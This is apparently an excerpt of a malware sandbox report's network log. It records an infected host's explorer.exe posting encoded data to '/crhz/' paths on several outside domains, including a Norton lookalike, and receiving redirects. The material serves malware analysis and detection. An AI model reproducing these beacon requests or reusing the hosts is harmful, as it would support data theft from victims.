                                                    Data Ascii: vG=j0ZaFCIY~bsm8dLg6hdzpWJ30m7f7sSvD299MVgtbTtkHsYMymVfGRqd(p6WEZgvJt5m3azhstg1jOi4GbsRsuktTBvVt4uTsuppQQ7M1dM75WcYt1UTgCzb~eRORBF2CWvz30RrB_LnuwWpN1iryF72X_oItMfZZuQZon6p1gXGLwzPKkJ2mRcqR6if3x4kYd2NmHgQjtxOK17pdJHKOCiu577Y0Rdg6xh_~dMKDnkanBQlV08aLcXZOXhAWmN6D0e_jr5lo30WS5T-dlZRN8K0QQhBO8hF6FFhcNk6jyTHgkkq7O~b5duHgEvGUfvydl3zyrAyJm35aS7w0oE47tKR7rutps(na9Iu0eEH4x7BC14nkIVb7TuuxI0rLlHyXn4NQ33TPWqOoc8c45Y0UHUVXwYLUx7Ow2v5h6oRhgT6fQv60YFBScmvK9JeIQwamuKpHtO16XruUMRJxfuW7Lj7CX1x56azievCreKjsgPuUgPL(5Shh9bTnP6tld(6epfb5gFuWjz3jlosySOcMqh_0m4viPqkzXZzhAddlBwHliaHQEUy58xiyXf_lyhf6xL0uGg4UxvCg_n6Y6AwiK2MR6jBO0TouIm_7qyvDjD8AeeUQFYtOQKZKHhcGIVZTx35131n4YvY(KKgAts43px-9seoO0g7L23-EVQcklY0WG~gv1SSjX3Xc5hHSzkZqQFYmw9EprT0oVX69H~S0eBmCe9cgQEwBDfl2XJrCfiIhsTNCMORqrrSshhq6MFFodYqNFkZRVsxeKkr7BFRrXzWJIoWO8dnV85SWNoC(OeZgghjUx5oIaexgVhzbJPkxrTu2JUKSCkZwrtYVaWXY4NvLd1dc6xqmN5tI3IHnkNgcqN_0Mvtiyf5xak5L_8ZwQqyJaVhc-BXaF7b7NoBm8s_g7JT(bTYQHh1Jk5BvChpou3ir8dvnzGc(HhqnVCGGdvZ(Go9k8pzTHR1JApar36PICEWEWNjMPIhXAB-5GbRdbNd1SyQ(tWdZAyy~F7_l9ZdRRG16kmV1c6ovhUgiaTIcZy86CK4qmAoFMz5uvWurBPQ7flKXfQ-gn(_ZGXnXL9qg31YYqas3goSAxfTWSUJx7xkRkjuUuumnPY6~M3xAQhuaNfea9WfBgMqAtKw7MVTcAIN5BVrp1N5a53yQVdTE53VqHxIh4491C8ZVbnrvGCK3gIurQGcIy9_klGGUpzrmdAFJZHIPJkW0f~FajjHI2bgY1wYlykrEakdQN2iGyN7tbOnLly568TjVmAsZXkuAVsFolJtrIiaDZQR14uGACwaceXZtO0aeAGb1sme7bjnbuJLSIPBbGQQTFrPKoupUgl_n6R6ygfE0LXicNWA709hUNBAf9JazgYZDaZYFfQnrxxQE9X4lLw5UKUZ4aHIACPijVawx7BnfLcIQEBr9xmAwu4tQM9oGHQ.
                                                    Jan 30, 2023 13:42:27.983197927 CET933INHTTP/1.1 302 Found
                                                    cache-control: max-age=0, private, must-revalidate
                                                    connection: close
                                                    content-length: 11
                                                    date: Mon, 30 Jan 2023 12:42:27 GMT
                                                    location: http://survey-smiles.com
                                                    server: nginx
                                                    set-cookie: sid=8dea5cc8-a09b-11ed-9225-bfa5da083fb0; path=/; domain=.nortonseecurity.com; expires=Sat, 17 Feb 2091 15:56:34 GMT; max-age=2147483647; HttpOnly
                                                    Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                    Data Ascii: Redirecting


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    37192.168.2.64976081.17.29.14880C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:42:30.510034084 CET934OUTGET /crhz/?vG=u2x6Gy1HortC0OzN6Cd7rlFhxGPGvueuCm4nHgUvPGM1CfYq7BcXTxTrgZqaFf90LIlR1PLFkcg9+OygBsERh/kgPh37+bmZ6fYtcBDUzbx8&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.nortonseecurity.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:42:30.531753063 CET935INHTTP/1.1 200 OK
                                                    accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                    cache-control: max-age=0, private, must-revalidate
                                                    connection: close
                                                    content-length: 617
                                                    content-type: text/html; charset=utf-8
                                                    date: Mon, 30 Jan 2023 12:42:30 GMT
                                                    server: nginx
                                                    set-cookie: sid=8f6f24a2-a09b-11ed-b709-bfa5cc855204; path=/; domain=.nortonseecurity.com; expires=Sat, 17 Feb 2091 15:56:37 GMT; max-age=2147483647; HttpOnly
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6f 72 74 6f 6e 73 65 65 63 75 72 69 74 79 2e 63 6f 6d 2f 63 72 68 7a 2f 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 59 33 4e 54 41 34 4f 54 63 31 4d 43 77 69 61 57 46 30 49 6a 6f 78 4e 6a 63 31 4d 44 67 79 4e 54 55 77 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 63 33 5a 6f 5a 47 51 7a 4f 54 4d 32 59 54 46 6b 4d 44 64 70 4d 58 4d 32 4f 54 6b 30 4e 44 4d 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 32 4e 7a 55 77 4f 44 49 31 4e 54 41 73 49 6e 52 7a 49 6a 6f 78 4e 6a 63 31 4d 44 67 79 4e 54 55 77 4e 54 45 34 4d 6a 49 77 66 51 2e 68 6b 52 65 78 4b 71 4d 78 4f 50 57 61 53 73 4f 54 41 77 5a 71 4d 6b 65 61 4d 52 58 52 63 43 6b 39 56 4b 44 44 77 7a 63 73 79 73 26 73 39 31 46 64 38 3d 62 38 78 6a 58 5f 26 73 69 64 3d 38 66 36 66 32 34 61 32 2d 61 30 39 62 2d 31 31 65 64 2d 62 37 30 39 2d 62 66 61 35 63 63 38 35 35 32 30 34 26 76 47 3d 75 32 78 36 47 79 31 48 6f 72 74 43 30 4f 7a 4e 36 43 64 37 72 6c 46 68 78 47 50 47 76 75 65 75 43 6d 34 6e 48 67 55 76 50 47 4d 31 43 66 59 71 37 42 63 58 54 78 54 72 67 5a 71 61 46 66 39 30 4c 49 6c 52 31 50 4c 46 6b 63 67 39 2b 4f 79 67 42 73 45 52 68 25 32 46 6b 67 50 68 33 37 2b 62 6d 5a 36 66 59 74 63 42 44 55 7a 62 78 38 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.nortonseecurity.com/crhz/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTY3NTA4OTc1MCwiaWF0IjoxNjc1MDgyNTUwLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIyc3ZoZGQzOTM2YTFkMDdpMXM2OTk0NDMiLCJuYmYiOjE2NzUwODI1NTAsInRzIjoxNjc1MDgyNTUwNTE4MjIwfQ.hkRexKqMxOPWaSsOTAwZqMkeaMRXRcCk9VKDDwzcsys&s91Fd8=b8xjX_&sid=8f6f24a2-a09b-11ed-b709-bfa5cc855204&vG=u2x6Gy1HortC0OzN6Cd7rlFhxGPGvueuCm4nHgUvPGM1CfYq7BcXTxTrgZqaFf90LIlR1PLFkcg9+OygBsERh%2FkgPh37+bmZ6fYtcBDUzbx8');</script></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    4192.168.2.649724164.88.201.21480C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:40:25.484545946 CET770OUTGET /crhz/?vG=LNHYCELR2jrkl6ex9ablCycu9h3K7h+sZB96ERWJZAieoidRiLebg6j0RcHsFDDJ9r29OHFtYH9IplqsElTHfTI2iz39I/8+/5l0mHu4niU0&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.sandpiper-apts.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:40:25.706928015 CET770INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Mon, 30 Jan 2023 12:40:25 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    5192.168.2.64972518.138.206.21380C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:40:30.970472097 CET771OUTPOST /crhz/ HTTP/1.1
                                                    Host: www.tf8dangky.online
                                                    Connection: close
                                                    Content-Length: 188
                                                    Cache-Control: no-cache
                                                    Origin: http://www.tf8dangky.online
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.tf8dangky.online/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 76 47 3d 31 5a 4e 6d 7e 71 37 64 47 32 57 50 6f 57 74 51 5a 43 63 2d 67 70 42 7a 34 58 53 39 47 48 76 4f 65 65 62 4e 55 58 57 38 4d 49 31 50 6f 53 63 46 61 74 75 6e 6d 44 45 70 38 34 7a 6f 69 34 7e 6e 58 44 35 78 71 4e 69 51 72 71 56 51 30 49 4d 79 71 59 59 5f 48 74 28 36 39 39 52 64 33 58 68 30 70 6b 61 67 71 4e 7e 74 6e 38 78 5f 35 6f 68 7a 48 76 6b 58 71 6c 71 35 36 76 71 35 6e 33 31 71 74 75 78 70 4d 43 63 43 56 75 34 75 73 71 56 75 61 6d 46 36 28 45 4a 37 38 77 55 67 65 6e 74 35 6d 6b 46 5a 30 45 39 63 4e 6e 31 4a 36 48 59 41 4e 6d 53 71 62 56 45 2e 00 00 00 00 00 00 00 00
                                                    Data Ascii: vG=1ZNm~q7dG2WPoWtQZCc-gpBz4XS9GHvOeebNUXW8MI1PoScFatunmDEp84zoi4~nXD5xqNiQrqVQ0IMyqYY_Ht(699Rd3Xh0pkagqN~tn8x_5ohzHvkXqlq56vq5n31qtuxpMCcCVu4usqVuamF6(EJ78wUgent5mkFZ0E9cNn1J6HYANmSqbVE.
                                                    Jan 30, 2023 13:40:31.172877073 CET772INHTTP/1.1 301 Moved Permanently
                                                    Server: openresty
                                                    Date: Mon, 30 Jan 2023 12:40:31 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 166
                                                    Connection: close
                                                    Location: https://www.tf8dangky.online/crhz/
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    6192.168.2.64972618.138.206.21380C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:40:33.696614027 CET774OUTPOST /crhz/ HTTP/1.1
                                                    Host: www.tf8dangky.online
                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.tf8dangky.online
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.tf8dangky.online/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 76 47 3d 31 5a 4e 6d 7e 71 37 64 47 32 57 50 79 33 64 51 62 68 6b 2d 6f 70 42 38 30 33 53 39 4e 6e 76 4b 65 65 58 4e 55 57 53 73 50 36 35 50 6f 42 6b 46 55 75 47 6e 6b 44 45 70 7e 34 7a 6b 6d 34 7e 4c 58 44 39 31 71 4d 53 36 72 6f 35 51 32 72 30 79 6f 61 41 38 4e 39 7e 63 71 74 52 65 33 58 68 6c 70 6b 4b 73 71 4e 4b 58 6e 38 70 5f 35 61 4a 7a 57 76 6b 55 6c 46 71 35 36 76 71 39 6e 33 30 7a 74 75 70 50 4d 47 59 53 53 59 55 75 70 36 31 75 63 42 78 39 32 6b 4a 5f 69 41 56 66 4f 79 77 76 38 47 45 64 37 6b 52 37 59 58 30 37 31 32 56 75 4b 48 65 72 5a 44 36 74 63 30 55 4b 56 51 4b 67 78 68 37 38 69 6f 39 36 53 31 52 48 42 56 61 68 70 6d 30 79 36 4b 31 31 4a 65 55 78 37 59 76 48 34 61 74 4b 5a 62 6d 62 62 64 66 4c 6e 6e 64 63 50 6b 35 58 37 32 63 63 43 4b 76 47 28 37 71 62 4f 50 44 70 38 52 51 36 55 53 49 31 59 47 53 2d 7a 46 56 30 43 56 6d 66 67 73 54 59 31 61 71 5f 44 4b 6b 6c 42 6a 54 75 6c 4e 55 51 33 51 34 63 38 76 63 51 41 33 47 71 73 66 46 43 7a 49 47 31 37 56 4f 68 48 4e 73 4f 4b 72 4e 79 76 6c 7e 4b 35 64 4c 63 33 57 66 70 66 6d 35 5a 52 48 28 75 46 72 39 77 38 48 51 69 36 58 4d 41 58 2d 4f 77 49 4a 6d 33 5a 79 67 53 43 6a 49 64 47 63 37 5f 63 52 57 36 78 4c 70 47 47 49 52 4e 61 35 69 51 76 41 73 58 57 65 56 5a 4a 76 71 71 34 75 6c 30 59 34 64 31 74 41 4d 31 30 39 45 33 64 72 68 30 68 53 45 49 51 64 4c 31 36 62 70 36 68 5f 64 61 6c 43 7e 76 47 70 28 6d 6b 6e 37 7a 7e 5a 38 33 4c 47 6e 49 66 55 4b 65 6a 37 46 6e 77 75 5a 4a 44 77 64 47 49 4e 6d 47 72 62 31 6c 57 47 77 49 7e 77 5a 2d 6f 6e 76 54 32 5a 68 53 76 63 48 2d 7a 4c 77 4d 57 6d 62 42 4d 55 36 5a 6b 36 49 36 6e 56 5a 73 36 46 73 4a 76 70 38 6e 64 5f 57 62 37 79 53 73 4c 65 30 74 72 76 39 42 6b 62 32 4f 41 53 5a 57 41 4c 28 49 4d 6f 51 37 66 32 4d 63 69 71 63 37 59 72 7a 71 38 67 78 65 34 46 4a 66 36 76 47 54 41 42 7a 61 57 43 58 44 45 42 6f 36 77 4a 34 58 6e 33 37 6c 56 35 37 49 56 47 67 55 75 37 4a 50 30 51 48 6f 54 6f 32 53 6d 61 35 53 4b 46 74 55 67 38 6e 73 7e 64 62 38 36 2d 70 7a 39 78 7e 51 34 71 58 77 49 78 31 61 67 37 47 4c 68 37 4b 57 47 42 4a 76 4f 31 32 54 39 72 78 77 39 69 41 6e 4d 41 46 35 4f 30 6a 36 71 71 6b 4a 33 6c 4d 2d 44 68 61 71 61 68 41 4e 38 77 72 4f 36 31 77 55 6a 64 37 4f 4b 58 69 70 56 74 35 57 6f 44 43 53 6a 50 51 68 28 79 6e 73 57 4b 67 61 43 67 73 54 78 6f 41 42 53 49 4b 79 4c 72 7a 73 4e 42 66 61 73 65 31 61 57 4c 62 72 6b 34 57 49 62 2d 50 77 67 43 76 71 37 4e 36 48 56 56 41 55 78 51 65 61 5a 49 51 6a 6b 56 68 5f 28 6e 45 32 4b 53 51 75 77 50 38 65 61 53 33 30 37 4f 6c 67 74 75 30 63 67 6f 50 74 30 66 35 44 4d 63 44 74 41 7a 6b 4b 69 58 49 66 6f 63 69 4a 77 39 52 59 56 36 34 6c 57 4c 6b 4b 6a 43 6a 46 61 38 42 6b 33 7a 41 64 43 4e 54 69 52 5a 66 51 50 67 77 32 6f 63 37 31 42 6e 58 4a 38 37 36 53 6f 71 56 31 76 31 38 79 69 30 71 36 76 58 4f 46 76 4f 6b 6f 79 69 44 39 33 78 6a 47 6d 6c 64 39 58 36 4c 67 34 6c 47 43 75 5a 43 54 7a 72 50 76 6e 72 47 49 77 64 39 46 36 39 63 6a 77 30 44 39 36 4b 76 69 31 6a 6c 73 4a 47 77 75 34 74 39 66 55 78 34 57 4d 49 63 55 4c 38 70 46 74 33 7a 69 4d 36 61 49 4e 62 31 74 36 47 49 74 58 7a 28 58 61 4a 32 59 38 38 57 55 4f 61 72 55 42 71 58 6b 59 4a 78 50 76 61 43 7a 43 74 34 61 65 44 49 4e 31 31 6f 31 54 4d 48 47 6c 5f 6f 48 50 2d 41 5f 4d 76 35 33 72 6a 6c 4c 4a 6d 4f 31 39 45 54 5a 69 35 53 6f 4d 61 36 6c 37 77 62 57 73 7a 77 6d 79 37 44 4e 73 2d 52 4a 51 5a 74 30 6d 79 49 63 59 4e 53 61 71 56 49 4e 6f 50 61 7a 77 73 47 58 64 66 7e 67 37 57 67 61 74 4a 7e 72 43 38 4c 4e 6b 30 61 2d 7e 2d 71 30 28 50 4f 53 52 48 77 63 41 4a 33 43 6c 62 6c 36 52 4c 6d 64 37 4e 7e 63 55 34 59 42 30 67 7e 77 54 65 46 53 6c 4d 4b 4b 31 7a 33 63 7a 47 64 41 72 47 36 76 76 43 31 65 52 52 74 75 4b 5a 49 5a 62 4d 79 42 73 5f 6a 75 59 50 4c 38 33 63 6e 63 72 36 74 2d 77 67 32 62 6c 59 4d 32 33 6c 4d 6e 57 39 51 38 41 4c 4b 6c 6a 4c 44 37 75 6c 4d 41 30 48 45 6a 62 74 30 57 51 36 55 6e 31 46 30 75 48 56 6f 4b 74 2d 30 41 75 62 78 56 70 66 53 53 52 69 56 4a 6d 66 59 32 76 6c 67 71 72 39 46 45 31 55 59 6b 6a 50 50 75 45 4a 4c 32 7e 48 67 44 48 4f 7a 4d 41 54 77 69 41 30 31 36 76 66 46 6f 36 50 45 5f 53 6e 48 58 70 6f 6e 65
                                                    Data Ascii: vG=1ZNm~q7dG2WPy3dQbhk-opB803S9NnvKeeXNUWSsP65PoBkFUuGnkDEp~4zkm4~LXD91qMS6ro5Q2r0yoaA8N9~cqtRe3XhlpkKsqNKXn8p_5aJzWvkUlFq56vq9n30ztupPMGYSSYUup61ucBx92kJ_iAVfOywv8GEd7kR7YX0712VuKHerZD6tc0UKVQKgxh78io96S1RHBVahpm0y6K11JeUx7YvH4atKZbmbbdfLnndcPk5X72ccCKvG(7qbOPDp8RQ6USI1YGS-zFV0CVmfgsTY1aq_DKklBjTulNUQ3Q4c8vcQA3GqsfFCzIG17VOhHNsOKrNyvl~K5dLc3Wfpfm5ZRH(uFr9w8HQi6XMAX-OwIJm3ZygSCjIdGc7_cRW6xLpGGIRNa5iQvAsXWeVZJvqq4ul0Y4d1tAM109E3drh0hSEIQdL16bp6h_dalC~vGp(mkn7z~Z83LGnIfUKej7FnwuZJDwdGINmGrb1lWGwI~wZ-onvT2ZhSvcH-zLwMWmbBMU6Zk6I6nVZs6FsJvp8nd_Wb7ySsLe0trv9Bkb2OASZWAL(IMoQ7f2Mciqc7Yrzq8gxe4FJf6vGTABzaWCXDEBo6wJ4Xn37lV57IVGgUu7JP0QHoTo2Sma5SKFtUg8ns~db86-pz9x~Q4qXwIx1ag7GLh7KWGBJvO12T9rxw9iAnMAF5O0j6qqkJ3lM-DhaqahAN8wrO61wUjd7OKXipVt5WoDCSjPQh(ynsWKgaCgsTxoABSIKyLrzsNBfase1aWLbrk4WIb-PwgCvq7N6HVVAUxQeaZIQjkVh_(nE2KSQuwP8eaS307Olgtu0cgoPt0f5DMcDtAzkKiXIfociJw9RYV64lWLkKjCjFa8Bk3zAdCNTiRZfQPgw2oc71BnXJ876SoqV1v18yi0q6vXOFvOkoyiD93xjGmld9X6Lg4lGCuZCTzrPvnrGIwd9F69cjw0D96Kvi1jlsJGwu4t9fUx4WMIcUL8pFt3ziM6aINb1t6GItXz(XaJ2Y88WUOarUBqXkYJxPvaCzCt4aeDIN11o1TMHGl_oHP-A_Mv53rjlLJmO19ETZi5SoMa6l7wbWszwmy7DNs-RJQZt0myIcYNSaqVINoPazwsGXdf~g7WgatJ~rC8LNk0a-~-q0(POSRHwcAJ3Clbl6RLmd7N~cU4YB0g~wTeFSlMKK1z3czGdArG6vvC1eRRtuKZIZbMyBs_juYPL83cncr6t-wg2blYM23lMnW9Q8ALKljLD7ulMA0HEjbt0WQ6Un1F0uHVoKt-0AubxVpfSSRiVJmfY2vlgqr9FE1UYkjPPuEJL2~HgDHOzMATwiA016vfFo6PE_SnHXponeiyN5EBiFmi5l3QhZ~gmCZkEp2kPIGvi6rCVb56TrU3j0Hdyw8rbux5qKN18X6l7DBc6Gv4CRz4u77tdanpsnrRg.
                                                    Jan 30, 2023 13:40:33.895081043 CET775INHTTP/1.1 301 Moved Permanently
                                                    Server: openresty
                                                    Date: Mon, 30 Jan 2023 12:40:33 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 166
                                                    Connection: close
                                                    Location: https://www.tf8dangky.online/crhz/
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    7192.168.2.64972718.138.206.21380C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:40:36.425826073 CET775OUTGET /crhz/?vG=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEnJIHJg+N9005boEqGm8iwl7o0&s91Fd8=b8xjX_ HTTP/1.1
                                                    Host: www.tf8dangky.online
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 30, 2023 13:40:36.635482073 CET776INHTTP/1.1 301 Moved Permanently
                                                    Server: openresty
                                                    Date: Mon, 30 Jan 2023 12:40:36 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 166
                                                    Connection: close
                                                    Location: https://www.tf8dangky.online/crhz/?vG=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEnJIHJg+N9005boEqGm8iwl7o0&s91Fd8=b8xjX_
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    8192.168.2.649728184.94.215.9180C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 30, 2023 13:40:41.845371008 CET777OUTPOST /crhz/ HTTP/1.1
                                                    Host: www.teammart.online
                                                    Connection: close
                                                    Content-Length: 188
                                                    Cache-Control: no-cache
                                                    Origin: http://www.teammart.online
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.teammart.online/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Data Raw: 76 47 3d 31 62 53 71 44 46 52 35 4f 76 63 4e 36 33 74 4b 71 42 6e 31 47 51 57 68 49 5f 64 69 55 54 6a 6e 78 2d 77 38 69 4b 78 78 78 6b 33 36 45 41 6c 41 7a 76 36 57 50 4f 43 48 61 57 59 6d 55 62 69 5a 54 4b 51 74 7e 53 31 4f 71 68 4a 72 7a 77 49 38 54 63 31 33 4a 50 44 75 59 33 44 30 6c 68 66 37 48 34 5a 75 71 7a 76 54 69 64 4a 35 78 41 48 51 75 71 52 6b 35 54 68 31 6a 65 31 67 4a 67 49 78 42 49 32 70 4a 70 62 71 47 57 6a 76 65 69 76 4e 35 49 6c 75 45 2d 5a 76 59 50 73 63 75 71 6e 34 4b 61 67 70 79 6a 57 47 64 54 32 7a 49 74 39 54 6e 41 70 63 6c 70 4d 2e 00 00 00 00 00 00 00 00
                                                    Data Ascii: vG=1bSqDFR5OvcN63tKqBn1GQWhI_diUTjnx-w8iKxxxk36EAlAzv6WPOCHaWYmUbiZTKQt~S1OqhJrzwI8Tc13JPDuY3D0lhf7H4ZuqzvTidJ5xAHQuqRk5Th1je1gJgIxBI2pJpbqGWjveivN5IluE-ZvYPscuqn4KagpyjWGdT2zIt9TnApclpM.
                                                    Jan 30, 2023 13:40:42.128724098 CET778INHTTP/1.1 404 Not Found
                                                    Date: Mon, 30 Jan 2023 12:40:41 GMT
                                                    Server: Apache
                                                    Content-Length: 5278
                                                    Connection: close
                                                    Content-Type: text/html
